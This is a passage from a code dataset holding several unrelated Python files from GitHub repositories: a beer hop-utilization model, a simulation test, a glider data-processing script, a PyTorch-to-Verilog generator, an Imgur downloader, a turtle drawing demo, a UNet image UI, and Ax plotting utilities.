in the wort:\n cool_util = np.where(\n t_mask,\n quad(cool_rate, 0., t_cool), quad(cool_rate, t_cool - t, t_cool)\n )\n\n return boil_util + cool_util\n \n def mIBU_rate_correction(self, t):\n \"\"\" mIBU relative rate differential correction factor.\n Args:\n t (float or numpy.ndarray): time\n b (float): Temperature decay time scale.\n \n Returns:\n float or numpy.ndarray: relative rate correction\n \"\"\"\n # Constants for mIBU model:\n c1 = 2.39e11\n c2 = 9773. # Units of E_activation / R\n c3 = 53.7\n c4 = 319.95\n\n return c1 * np.exp(-c2 / (c3 * np.exp(-self.b * (t)) + c4))\n\nclass TinsethTime():\n \"\"\" Container class for Tinseth temporal component calculations\n \"\"\"\n @staticmethod\n def tinseth(max_u=0.241, r=0.04):\n \"\"\" Temporal component of Tinseth model. Max_u and r taken from Palmer.\n Note: 0.241 = 1 / 4.15.\n Args:\n max_u (float): Maximum utilization constant. Default is 0.241.\n r (float): Rate constant of growth. Default is 0.04.\n\n Results:\n function: Time component of utilization function.\n \"\"\"\n return lambda t: max_u * (1. - np.exp(-r * t)) \n\n @staticmethod\n def tinseth_rate(max_u=0.241, r=0.04):\n \"\"\" Derivative of the temporal component of Tinseth model.\n Note: 0.241 = 1 / 4.15.\n Args:\n max_u (float): Maximum utilization constant. Default is 0.241.\n r (float): Rate constant of growth. Default is 0.04.\n\n Results:\n function: Time component of utilization function derivative.\n \"\"\"\n return lambda t: max_u * r * np.exp(-r * t)\n\n","repo_name":"jhand1993/MegaBeer","sub_path":"MegaBeer/calculation/hops/iso_time.py","file_name":"iso_time.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33096836676","text":"from pysimenv.common.model import SignalGenerator, Integrator, Sequential\nfrom pysimenv.core.simulator import Simulator\n\n\ndef main():\n signal_generator = SignalGenerator(\n shaping_fun=lambda t: 1./(1. + t)**2\n )\n integrator = Integrator([0.])\n model = Sequential([signal_generator, integrator])\n simulator = Simulator(model)\n simulator.propagate(0.01, 10., True)\n integrator.default_plot(show=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"minii93/pysimenv","sub_path":"pysimenv/test/test_integrator.py","file_name":"test_integrator.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18166249856","text":"import datetime\nimport pathlib\nimport pandas as pd\nimport numpy as np\nimport logging\nimport types\nfrom pathlib import Path\nfrom pyglider_single_mission import process\n_log = logging.getLogger(__name__)\n\n\ndef adcp_status(glider, mission):\n pld_file = list(Path(f\"/data/data_raw/complete_mission/SEA{glider}/M{mission}/\").glob(\"*pld1.raw.*gz\"))[0]\n df = pd.read_csv(pld_file, sep=\";\")\n if \"AD2CP_PRESSURE\" not in list(df):\n _log.info(\"no adcp data expected\")\n return True\n if Path(f\"/data/data_raw/complete_mission/SEA{glider}/M{mission}/ADCP/sea{glider}_m{mission}_ad2cp.nc\").exists():\n _log.info(\"adcp data file found\")\n return True\n else:\n _log.warning(\"did not find expected ADCP file\")\n return False\n\n\ndef main():\n logf = f'/data/log/new_complete_mission.log'\n logging.basicConfig(filename=logf,\n filemode='a',\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S')\n _log.info(\"Check for new missions\")\n df_reprocess = pd.read_csv('/home/pipeline/reprocess.csv', parse_dates=[\"proc_time\"])\n df_reprocess.sort_values(\"proc_time\", inplace=True)\n _log.info(f\"start length {len(df_reprocess)}\")\n glider_paths = list(pathlib.Path(\"/data/data_raw/complete_mission\").glob(\"SEA*\"))\n glider_paths_good = []\n for path in glider_paths:\n if \"SEA57\" in str(path):\n continue\n mission_paths = path.glob(\"M*\")\n\n glider_paths_good.append(mission_paths)\n glider_paths_good = [item for sublist in glider_paths_good for item in sublist]\n if len(glider_paths_good) == len(df_reprocess):\n _log.info(\"No new missions to process\")\n return\n for mission_path in glider_paths_good:\n glider = int(mission_path.parts[-2][3:])\n mission = int(mission_path.parts[-1][1:])\n a = [np.logical_and(df_reprocess.glider == glider, df_reprocess.mission == mission)]\n if not sum(sum(a)):\n _log.warning(f\"new mission {mission_path}\")\n if not adcp_status(glider, mission):\n continue\n args = types.SimpleNamespace()\n args.glider = glider\n args.mission = mission\n args.kind = \"raw\"\n process(args)\n nc_file = list((pathlib.Path(f\"/data/data_l0_pyglider/complete_mission/SEA{glider}/M{mission}/timeseries\")).glob('*.nc'))[0]\n nc_time = nc_file.lstat().st_mtime\n nc_time = datetime.datetime.fromtimestamp(nc_time)\n new_row = pd.DataFrame({\"glider\": glider, \"mission\": mission,\n \"proc_time\": nc_time, \"duration\": datetime.timedelta(minutes=20)},\n index=[len(df_reprocess)])\n df_reprocess = pd.concat((df_reprocess, new_row))\n _log.info(f\"end length {len(df_reprocess)}\")\n df_reprocess[\"gm\"] = df_reprocess.glider * 10000 + df_reprocess.mission\n df_reprocess = df_reprocess.groupby(\"gm\").first()\n df_reprocess.sort_values(\"proc_time\", inplace=True)\n\n\nif __name__ == '__main__':\n main()\n _log.info(\"Complete\")\n","repo_name":"voto-ocean-knowledge/utility_scripts","sub_path":"new_complete_missions.py","file_name":"new_complete_missions.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38213875661","text":"from torch import nn\n\nimport layers\nfrom constants import test_bench_template\n\n\nclass Model:\n def __init__(self, model: nn.Sequential):\n self.model = model\n self.layers = []\n\n def __str__(self):\n return '\\n'.join(str(layer) for layer in self.layers)\n\n def parse_layers(self):\n for i, layer in enumerate(self.model):\n if isinstance(layer, nn.Linear):\n self.layers.append(layers.Linear.layer_from(layer, i))\n elif isinstance(layer, nn.ReLU):\n self.layers.append(layers.ReLU(self.model[i - 1].out_features, i))\n else:\n raise ValueError(f'Unknown layer type {layer}')\n\n def emit(self):\n out = [\"`timescale 1ns / 1ps\"]\n\n top = [\n \"module top(in, out);\",\n f\" input [{self.layers[0].shape[0] -1}:0] in;\",\n f\" output [{self.layers[-1].shape[-1] -1}:0] out;\\n\"\n ]\n\n for i, layer in enumerate(self.layers):\n out.append(layer.emit())\n top.append(f\" wire [{layer.shape[-1] - 1}:0] layer_{i}_out;\")\n\n if i == 0:\n top.append(f\" {layer.name} layer_{i}(in, layer_{i}_out);\")\n else:\n top.append(f\" {layer.name} layer_{i}(layer_{i - 1}_out, layer_{i}_out);\")\n\n top.append(f\"\\n assign out = layer_{len(self.layers) - 1}_out;\")\n top.append(\"endmodule\")\n\n out.append('\\n'.join(top))\n\n return '\\n'.join(out)\n\n def emit_test_bench(self):\n return test_bench_template.format(input_length=2 ** self.layers[0].shape[0])\n\n\ndef test():\n simple_model = nn.Sequential(\n nn.Linear(2, 2),\n nn.ReLU(),\n nn.Linear(2, 2),\n nn.ReLU(),\n nn.Linear(2, 1),\n )\n\n model = Model(simple_model)\n model.parse_layers()\n\n print(model)\n code = model.emit()\n\n with open('test.v', 'w') as f:\n f.write(code)\n\n with open('test_tb.v', 'w') as f:\n f.write(model.emit_test_bench())\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"rohittp0/chipon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12691188059","text":"from imgurpython import ImgurClient\nimport urllib.request\nimport timeit\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing import Pool\n\ndef descarga_url_img(link):\n #print(link)\n # Con esto ya podemos obtener el corte de la url imagen\n nombre_img = link.split(\"/\")[3]\n formato_img = nombre_img.split(\".\")[1]\n nombre_img = nombre_img.split(\".\")[0]\n print(nombre_img, formato_img)\n url_local = \"/Users/txpla/Desktop/Escuela/Concurrencia/Imagenes/{}.{}\" #es la ruta local, y cambiara de acuerdo al equipo\n #Guardar nne local las imagenes\n urllib.request.urlretrieve(link, url_local.format(nombre_img, formato_img))\n \ndef imagenes(lista,cliente):\n id_album = \"bUaCfoz\"\n imagenes = cliente.get_album_images(id_album)\n for imagen in imagenes:\n lista.append(imagen.link) #lista de imagenes\n\ndef cliente():\n secreto_cliente = \"5f8c3cce299db5e26a2eb96b0b7809a82805c9ad\"\n id_cliente = \"bfa0e227a1c5643\"\n cliente = ImgurClient(id_cliente, secreto_cliente) # cliente\n return cliente\n\ndef useThreadPoolExecutor(): #creamos\n ejecucion = ThreadPoolExecutor(max_workers=len(lista))\n ejecucion.map(descarga_url_img,lista)\n\ndef usePool(): #creamos\n ejecucion = Pool(len(lista))\n ejecucion.map(descarga_url_img,lista)\n \ndef useSincron():\n for i in lista:\n descarga_url_img(i) #creamos\n \nif __name__ == \"__main__\":\n lista = []\n client = cliente()\n imagenes(lista,client)\n print(\"Tiempo de descarga usando la descarga sincrona: {}\".format(timeit.Timer(useSincron).timeit(number=1)))\n print(\"Tiempo de descarga usando Subprocesos ThreadPoolExecutor: {}\".format(timeit.Timer(useThreadPoolExecutor).timeit(number=1)))\n print(\"Tiempo de descarga usando Multiprocesamiento Pool: {}\".format(timeit.Timer(usePool).timeit(number=1)))","repo_name":"193228/193228-Actividad-Imagenes","sub_path":"actividadDescargas.py","file_name":"actividadDescargas.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26946044014","text":"#\n# Coding Explosion!\n# 10-11-2021\n#\n# Elisabetta Siboni e Maurizio Conti\n# Servizio Marconi - USR-ER 2021\n#\nimport turtle\nprint( \"Disegna poligoni parametrici\" )\n\n# parametri in ingresso\nlati = 5\nlato = 80\n\nturtle.pendown()\n\n# esegue “lati” volte le istruzioni\nfor x in range(lati):\n angolo = 360/lati\n turtle.forward(lato)\n turtle.right(angolo)\n\n# domanda:\n# Ci sono delle istruzioni che sprecano energia?\n# Se eseguiamo 100 volte il corpo del for... \n\n# spegne i motori e risparmia energia\ndone()\n","repo_name":"fablabromagna-org/Draw-ER","sub_path":"Software/CircuitPython/4-poligoni-parametri.py","file_name":"4-poligoni-parametri.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39878956070","text":"import imp\r\nfrom pyexpat import model\r\nfrom PySide6.QtWidgets import *\r\nfrom PySide6.QtUiTools import *\r\nfrom PySide6.QtCore import *\r\nfrom PySide6.QtGui import *\r\nfrom soupsieve import select\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport argparse\r\n\r\n\r\nwidth=height=256\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--input_model\",type=str,help='path of the model')\r\nargs = parser.parse_args()\r\n\r\n\r\nclass UI(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n loader=QUiLoader()\r\n self.ui=loader.load('form.ui',None)\r\n self.ui.show()\r\n self.ui.btn_choosemodel.clicked.connect(self.choose_model)\r\n self.ui.btn_chooseimage.clicked.connect(self.choose_image)\r\n self.ui.btn_result.clicked.connect(self.result)\r\n \r\n \r\n def choose_model(self):\r\n selected_model=QFileDialog.getOpenFileName(self,\"Choose Model\",\".\",\"All Files (*.*)\")\r\n self.ui.txt_model.setText=selected_model\r\n self.model=load_model(selected_model)\r\n \r\n \r\n\r\n def choose_image(self):\r\n img_file=QFileDialog.getOpenFileName(self,\"Choose Image\",\".\",\"All Files (*.*)\")\r\n img = cv2.imread(img_file[0])\r\n self.img_rgb = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n img = QImage(self.img_rgb, self.img_rgb.shape[1], self.img_rgb.shape[0],QImage.Format_RGB888)\r\n set_image = QPixmap.fromImage(img)\r\n self.ui.lbl_image.setPixmap(set_image)\r\n\r\n\r\n def result(self):\r\n image = cv2.resize(self.img_rgb,(256,256)).astype(np.float32)\r\n image = image[np.newaxis,...]\r\n image = (image / 127.5) - 1\r\n generator = model(img,training=True)\r\n generator= np.squeeze(generator, axis=0)\r\n generator = np.array((generator +1) *127.5).astype(np.uint8)\r\n img = QImage(generator, generator.shape[1], generator.shape[0],QImage.Format_RGB888)\r\n result_image = QPixmap.fromImage(img)\r\n self.ui.lbl_result.setPixmap(result_image)\r\n\r\n\r\n\r\napp=QApplication([]) \r\nwindow=UI()\r\napp.exec()\r\n","repo_name":"Parisa-Bagherzadeh/DeepLearning","sub_path":"UNet_day2night/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"17465615253","text":"import math\nfrom collections import Counter\n\nfrom logging import Logger\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\n\nimport numpy as np\nfrom ax.core.generator_run import GeneratorRun\nfrom ax.core.observation import Observation, ObservationFeatures\nfrom ax.core.parameter import (\n ChoiceParameter,\n FixedParameter,\n Parameter,\n ParameterType,\n RangeParameter,\n)\nfrom ax.core.types import TParameterization\nfrom ax.modelbridge.base import ModelBridge\nfrom ax.modelbridge.prediction_utils import (\n _compute_scalarized_outcome,\n predict_at_point,\n)\nfrom ax.modelbridge.transforms.ivw import IVW\nfrom ax.plot.base import DECIMALS, PlotData, PlotInSampleArm, PlotOutOfSampleArm, Z\nfrom ax.utils.common.logger import get_logger\nfrom ax.utils.common.typeutils import not_none\n\nlogger: Logger = get_logger(__name__)\n\n# Typing alias\nRawData = List[Dict[str, Union[str, float]]]\n\nTNullableGeneratorRunsDict = Optional[Dict[str, GeneratorRun]]\n\n\ndef extend_range(\n lower: float, upper: float, percent: int = 10, log_scale: bool = False\n) -> Tuple[float, float]:\n \"\"\"Given a range of minimum and maximum values taken by values on a given axis,\n extend it in both directions by a given percentage to have some margin within\n the plot around its meaningful part.\n \"\"\"\n if upper <= lower:\n raise ValueError(\n f\"`upper` should be greater than `lower`, got: {upper} (<= {lower}).\"\n )\n\n if log_scale:\n raise NotImplementedError(\"Log scale not yet supported.\")\n\n margin = (upper - lower) * percent / 100\n\n return lower - margin, upper + margin\n\n\ndef _format_dict(param_dict: TParameterization, name: str = \"Parameterization\") -> str:\n \"\"\"Format a dictionary for labels.\n\n Args:\n param_dict: Dictionary to be formatted\n name: String name of the thing being formatted.\n\n Returns: stringified blob.\n \"\"\"\n if len(param_dict) >= 10:\n blob = \"{} has too many items to render on hover ({}).\".format(\n name, len(param_dict)\n )\n else:\n blob = \"
{}:
{}\".format(\n name, \"
\".join(\"{}: {}\".format(n, v) for n, v in param_dict.items())\n )\n return blob\n\n\ndef _wrap_metric(metric_name: str) -> str:\n \"\"\"Put a newline on \"::\" for metric names.\n\n Args:\n metric_name: metric name.\n\n Returns: wrapped metric name.\n \"\"\"\n if \"::\" in metric_name:\n return \"
\".join(metric_name.split(\"::\"))\n else:\n return metric_name\n\n\ndef _format_CI(estimate: float, sd: float, relative: bool, zval: float = Z) -> str:\n \"\"\"Format confidence intervals given estimate and standard deviation.\n\n Args:\n estimate: point estimate.\n sd: standard deviation of point estimate.\n relative: if True, '%' is appended.\n zval: z-value associated with desired CI (e.g. 1.96 for 95% CIs)\n\n Returns: formatted confidence interval.\n \"\"\"\n return \"[{lb:.{digits}f}{perc}, {ub:.{digits}f}{perc}]\".format(\n lb=estimate - zval * sd,\n ub=estimate + zval * sd,\n digits=DECIMALS,\n perc=\"%\" if relative else \"\",\n )\n\n\ndef arm_name_to_tuple(arm_name: str) -> Union[Tuple[int, int], Tuple[int]]:\n tup = arm_name.split(\"_\")\n if len(tup) == 2:\n try:\n return (int(tup[0]), int(tup[1]))\n except ValueError:\n return (0,)\n return (0,)\n\n\ndef arm_name_to_sort_key(arm_name: str) -> Tuple[str, int, int]:\n \"\"\"Parses arm name into tuple suitable for reverse sorting by key\n\n Example:\n arm_names = [\"0_0\", \"1_10\", \"1_2\", \"10_0\", \"control\"]\n sorted(arm_names, key=arm_name_to_sort_key, reverse=True)\n [\"control\", \"0_0\", \"1_2\", \"1_10\", \"10_0\"]\n \"\"\"\n try:\n trial_index, arm_index = arm_name.split(\"_\")\n return (\"\", -int(trial_index), -int(arm_index))\n except (ValueError, IndexError):\n return (arm_name, 0, 0)\n\n\ndef resize_subtitles(figure: Dict[str, Any], size: int) -> Dict[str, Any]:\n for ant in figure[\"layout\"][\"annotations\"]:\n ant[\"font\"].update(size=size)\n return figure\n\n\ndef _filter_dict(\n param_dict: TParameterization, subset_keys: List[str]\n) -> TParameterization:\n \"\"\"Filter a dictionary to keys present in a given list.\"\"\"\n return {k: v for k, v in param_dict.items() if k in subset_keys}\n\n\ndef _get_in_sample_arms(\n model: ModelBridge,\n metric_names: Set[str],\n fixed_features: Optional[ObservationFeatures] = None,\n data_selector: Optional[Callable[[Observation], bool]] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Tuple[Dict[str, PlotInSampleArm], RawData, Dict[str, TParameterization]]:\n \"\"\"Get in-sample arms from a model with observed and predicted values\n for specified metrics.\n\n Returns a PlotInSampleArm object in which repeated observations are merged\n with IVW, and a RawData object in which every observation is listed.\n\n Fixed features input can be used to override fields of the insample arms\n when making model predictions.\n\n Args:\n model: An instance of the model bridge.\n metric_names: Restrict predictions to these metrics. If None, uses all\n metrics in the model.\n fixed_features: Features that should be fixed in the arms this function\n will obtain predictions for.\n data_selector: Function for selecting observations for plotting.\n\n Returns:\n A tuple containing\n\n - Map from arm name to PlotInSampleArm.\n - List of the data for each observation like::\n\n {'metric_name': 'likes', 'arm_name': '0_0', 'mean': 1., 'sem': 0.1}\n\n - Map from arm name to parameters\n \"\"\"\n observations = model.get_training_data()\n training_in_design = model.training_in_design\n if data_selector is not None:\n observations = [obs for obs in observations if data_selector(obs)]\n training_in_design = [\n model.training_in_design[i]\n for i, obs in enumerate(observations)\n if data_selector(obs)\n ]\n trial_selector = None\n if fixed_features is not None:\n trial_selector = fixed_features.trial_index\n # Calculate raw data\n raw_data = []\n arm_name_to_parameters = {}\n for obs in observations:\n arm_name_to_parameters[obs.arm_name] = obs.features.parameters\n for j, metric_name in enumerate(obs.data.metric_names):\n if metric_name in metric_names:\n raw_data.append(\n {\n \"metric_name\": metric_name,\n \"arm_name\": obs.arm_name,\n \"mean\": obs.data.means[j],\n \"sem\": np.sqrt(obs.data.covariance[j, j]),\n }\n )\n\n # Check that we have one ObservationFeatures per arm name since we\n # key by arm name and the model is not Multi-task.\n # If \"TrialAsTask\" is present, one of the arms is chosen based on the selected\n # trial index in the fixed_features.\n if (\"TrialAsTask\" not in model.transforms.keys() or trial_selector is None) and (\n len(arm_name_to_parameters) != len(observations)\n ):\n logger.error(\n \"Have observations of arms with different features but same\"\n \" name. Arbitrary one will be plotted.\"\n )\n\n # Merge multiple measurements within each Observation with IVW to get\n # un-modeled prediction\n t = IVW(None, [])\n observations = t.transform_observations(observations)\n # Start filling in plot data\n in_sample_plot: Dict[str, PlotInSampleArm] = {}\n for i, obs in enumerate(observations):\n if obs.arm_name is None:\n raise ValueError(\"Observation must have arm name for plotting.\")\n\n # Extract raw measurement\n obs_y = {} # Observed metric means.\n obs_se = {} # Observed metric standard errors.\n for j, metric_name in enumerate(obs.data.metric_names):\n if metric_name in metric_names:\n obs_y[metric_name] = obs.data.means[j]\n obs_se[metric_name] = np.sqrt(obs.data.covariance[j, j])\n # Obtain aggregated outcomes if scalarized_metric_config is provided\n if scalarized_metric_config is not None:\n for agg_metric in scalarized_metric_config:\n agg_metric_name = agg_metric[\"name\"]\n if agg_metric_name in metric_names:\n agg_mean, agg_var = _compute_scalarized_outcome(\n mean_dict=obs.data.means_dict,\n cov_dict=obs.data.covariance_matrix,\n agg_metric_weight_dict=agg_metric[\"weight\"],\n )\n obs_y[agg_metric_name] = agg_mean\n obs_se[agg_metric_name] = np.sqrt(agg_var)\n if training_in_design[i]:\n # Update with the input fixed features\n features = obs.features\n if fixed_features is not None:\n features.update_features(fixed_features)\n # Make a prediction.\n pred_y, pred_se = predict_at_point(\n model, features, metric_names, scalarized_metric_config\n )\n elif (trial_selector is not None) and (\n obs.features.trial_index != trial_selector\n ):\n # check whether the observation is from the right trial\n # need to use raw data in the selected trial for out-of-design points\n continue\n else:\n pred_y = obs_y\n pred_se = obs_se\n in_sample_plot[not_none(obs.arm_name)] = PlotInSampleArm(\n name=not_none(obs.arm_name),\n y=obs_y,\n se=obs_se,\n parameters=obs.features.parameters,\n y_hat=pred_y,\n se_hat=pred_se,\n context_stratum=None,\n )\n return in_sample_plot, raw_data, arm_name_to_parameters\n\n\ndef _get_out_of_sample_arms(\n model: ModelBridge,\n generator_runs_dict: Dict[str, GeneratorRun],\n metric_names: Set[str],\n fixed_features: Optional[ObservationFeatures] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Dict[str, Dict[str, PlotOutOfSampleArm]]:\n \"\"\"Get out-of-sample predictions from a model given a dict of generator runs.\n\n Fixed features input can be used to override fields of the candidate arms\n when making model predictions.\n\n Args:\n model: The model.\n generator_runs_dict: a mapping from generator run name to generator run.\n metric_names: metrics to include in the plot.\n\n Returns:\n A mapping from name to a mapping from arm name to plot.\n\n \"\"\"\n out_of_sample_plot: Dict[str, Dict[str, PlotOutOfSampleArm]] = {}\n for generator_run_name, generator_run in generator_runs_dict.items():\n out_of_sample_plot[generator_run_name] = {}\n for arm in generator_run.arms:\n # This assumes context is None\n obsf = ObservationFeatures.from_arm(arm)\n if fixed_features is not None:\n obsf.update_features(fixed_features)\n\n # Make a prediction\n try:\n pred_y, pred_se = predict_at_point(\n model, obsf, metric_names, scalarized_metric_config\n )\n except Exception:\n # Check if it is an out-of-design arm.\n if not model.model_space.check_membership(obsf.parameters):\n # Skip this point\n continue\n else:\n # It should have worked\n raise\n arm_name = arm.name_or_short_signature\n out_of_sample_plot[generator_run_name][arm_name] = PlotOutOfSampleArm(\n name=arm_name,\n parameters=obsf.parameters,\n y_hat=pred_y,\n se_hat=pred_se,\n context_stratum=None,\n )\n return out_of_sample_plot\n\n\ndef get_plot_data(\n model: ModelBridge,\n generator_runs_dict: Dict[str, GeneratorRun],\n metric_names: Optional[Set[str]] = None,\n fixed_features: Optional[ObservationFeatures] = None,\n data_selector: Optional[Callable[[Observation], bool]] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Tuple[PlotData, RawData, Dict[str, TParameterization]]:\n \"\"\"Format data object with metrics for in-sample and out-of-sample\n arms.\n\n Calculate both observed and predicted metrics for in-sample arms.\n Calculate predicted metrics for out-of-sample arms passed via the\n `generator_runs_dict` argument.\n\n In PlotData, in-sample observations are merged with IVW. In RawData, they\n are left un-merged and given as a list of dictionaries, one for each\n observation and having keys 'arm_name', 'mean', and 'sem'.\n\n Args:\n model: The model.\n generator_runs_dict: a mapping from generator run name to generator run.\n metric_names: Restrict predictions to this set. If None, all metrics\n in the model will be returned.\n fixed_features: Fixed features to use when making model predictions.\n data_selector: Function for selecting observations for plotting.\n scalarized_metric_config: An optional list of dicts specifying how to aggregate\n multiple metrics into a single scalarized metric. For each dict, the key is\n the name of the new scalarized metric, and the value is a dictionary mapping\n each metric to its weight. e.g.\n {\"name\": \"metric1:agg\", \"weight\": {\"metric1_c1\": 0.5, \"metric1_c2\": 0.5}}.\n\n Returns:\n A tuple containing\n\n - PlotData object with in-sample and out-of-sample predictions.\n - List of observations like::\n\n {'metric_name': 'likes', 'arm_name': '0_1', 'mean': 1., 'sem': 0.1}.\n\n - Mapping from arm name to parameters.\n \"\"\"\n metrics_plot = model.metric_names if metric_names is None else metric_names\n in_sample_plot, raw_data, cond_name_to_parameters = _get_in_sample_arms(\n model=model,\n metric_names=metrics_plot,\n fixed_features=fixed_features,\n data_selector=data_selector,\n scalarized_metric_config=scalarized_metric_config,\n )\n out_of_sample_plot = _get_out_of_sample_arms(\n model=model,\n generator_runs_dict=generator_runs_dict,\n metric_names=metrics_plot,\n fixed_features=fixed_features,\n scalarized_metric_config=scalarized_metric_config,\n )\n status_quo_name = None if model.status_quo is None else model.status_quo.arm_name\n plot_data = PlotData(\n metrics=list(metrics_plot),\n in_sample=in_sample_plot,\n out_of_sample=out_of_sample_plot,\n status_quo_name=status_quo_name,\n )\n return plot_data, raw_data, cond_name_to_parameters\n\n\ndef get_range_parameter(model: ModelBridge, param_name: str) -> RangeParameter:\n \"\"\"\n Get the range parameter with the given name from the model.\n\n Throws if parameter doesn't exist or is not a range parameter.\n\n Args:\n model: The model.\n param_name: The name of the RangeParameter to be found.\n\n Returns: The RangeParameter named `param_name`.\n \"\"\"\n\n range_param = model.model_space.parameters.get(param_name)\n if range_param is None:\n raise ValueError(f\"Parameter `{param_name}` does not exist.\")\n if not isinstance(range_param, RangeParameter):\n raise ValueError(f\"{param_name} is not a RangeParameter\")\n\n return range_param\n\n\ndef get_range_parameters_from_list(\n parameters: List[Parameter], min_num_values: int = 0\n) -> List[RangeParameter]:\n \"\"\"\n Get a list of range parameters from a model.\n\n Args:\n parameters: List of parameters\n min_num_values: Minimum number of values\n\n Returns: List of RangeParameters.\n \"\"\"\n return [\n parameter\n for parameter in parameters\n if isinstance(parameter, RangeParameter)\n and (\n parameter.parameter_type == ParameterType.FLOAT\n or parameter.upper - parameter.lower + 1 >= min_num_values\n )\n ]\n\n\ndef get_range_parameters(\n model: ModelBridge, min_num_values: int = 0\n) -> List[RangeParameter]:\n \"\"\"\n Get a list of range parameters from a model.\n\n Args:\n model: The model.\n min_num_values: Minimum number of values\n\n Returns: List of RangeParameters.\n \"\"\"\n return get_range_parameters_from_list(\n parameters=list(model.model_space.parameters.values()),\n min_num_values=min_num_values,\n )\n\n\ndef get_grid_for_parameter(parameter: RangeParameter, density: int) -> np.ndarray:\n \"\"\"Get a grid of points along the range of the parameter.\n\n Will be a log-scale grid if parameter is log scale.\n\n Args:\n parameter: Parameter for which to generate grid.\n density: Number of points in the grid.\n \"\"\"\n is_log = parameter.log_scale\n if is_log:\n grid = np.linspace(\n np.log10(parameter.lower), np.log10(parameter.upper), density\n )\n grid = 10**grid\n else:\n grid = np.linspace(parameter.lower, parameter.upper, density)\n return grid\n\n\ndef get_fixed_values(\n model: ModelBridge,\n slice_values: Optional[Dict[str, Any]] = None,\n trial_index: Optional[int] = None,\n) -> TParameterization:\n \"\"\"Get fixed values for parameters in a slice plot.\n\n If there is an in-design status quo, those values will be used. Otherwise,\n the mean of RangeParameters or the mode of ChoiceParameters is used.\n\n Any value in slice_values will override the above.\n\n Args:\n model: ModelBridge being used for plotting\n slice_values: Map from parameter name to value at which is should be\n fixed.\n\n Returns: Map from parameter name to fixed value.\n \"\"\"\n\n if trial_index is not None:\n if slice_values is None:\n slice_values = {}\n slice_values[\"TRIAL_PARAM\"] = str(trial_index)\n\n # Check if status_quo is in design\n if model.status_quo is not None and model.model_space.check_membership(\n model.status_quo.features.parameters\n ):\n setx = model.status_quo.features.parameters\n else:\n observations = model.get_training_data()\n setx = {}\n for p_name, parameter in model.model_space.parameters.items():\n # Exclude out of design status quo (no parameters)\n vals = [\n obs.features.parameters[p_name]\n for obs in observations\n if (\n len(obs.features.parameters) > 0\n and parameter.validate(obs.features.parameters[p_name])\n )\n ]\n if isinstance(parameter, FixedParameter):\n setx[p_name] = parameter.value\n elif isinstance(parameter, ChoiceParameter):\n setx[p_name] = Counter(vals).most_common(1)[0][0]\n elif isinstance(parameter, RangeParameter):\n setx[p_name] = parameter.cast(np.mean(vals))\n\n if slice_values is not None:\n # slice_values has type Dictionary[str, Any]\n setx.update(slice_values)\n return setx\n\n\n# Utility methods ported from JS\n# pyre-fixme[2]: Parameter must be annotated.\ndef contour_config_to_trace(config) -> List[Dict[str, Any]]:\n # Load from config\n arm_data = config[\"arm_data\"]\n density = config[\"density\"]\n grid_x = config[\"grid_x\"]\n grid_y = config[\"grid_y\"]\n f = config[\"f\"]\n lower_is_better = config[\"lower_is_better\"]\n metric = config[\"metric\"]\n rel = config[\"rel\"]\n sd = config[\"sd\"]\n xvar = config[\"xvar\"]\n yvar = config[\"yvar\"]\n\n green_scale = config[\"green_scale\"]\n green_pink_scale = config[\"green_pink_scale\"]\n blue_scale = config[\"blue_scale\"]\n\n # format data\n res = relativize_data(f, sd, rel, arm_data, metric)\n f_final = res[0]\n sd_final = res[1]\n\n # calculate max of abs(outcome), used for colorscale\n f_absmax = max(abs(min(f_final)), max(f_final))\n\n # transform to nested array\n f_plt = []\n for ind in range(0, len(f_final), density):\n f_plt.append(f_final[ind : ind + density])\n sd_plt = []\n for ind in range(0, len(sd_final), density):\n sd_plt.append(sd_final[ind : ind + density])\n\n CONTOUR_CONFIG = {\n \"autocolorscale\": False,\n \"autocontour\": True,\n \"contours\": {\"coloring\": \"heatmap\"},\n \"hoverinfo\": \"x+y+z\",\n \"ncontours\": int(density / 2),\n \"type\": \"contour\",\n \"x\": grid_x,\n \"y\": grid_y,\n }\n\n if rel:\n f_scale = reversed(green_pink_scale) if lower_is_better else green_pink_scale\n else:\n f_scale = green_scale\n\n f_trace = {\n \"colorbar\": {\n \"x\": 0.45,\n \"y\": 0.5,\n \"ticksuffix\": \"%\" if rel else \"\",\n \"tickfont\": {\"size\": 8},\n },\n \"colorscale\": [(i / (len(f_scale) - 1), rgb(v)) for i, v in enumerate(f_scale)],\n \"xaxis\": \"x\",\n \"yaxis\": \"y\",\n \"z\": f_plt,\n # zmax and zmin are ignored if zauto is true\n \"zauto\": not rel,\n \"zmax\": f_absmax,\n \"zmin\": -f_absmax,\n }\n\n sd_trace = {\n \"colorbar\": {\n 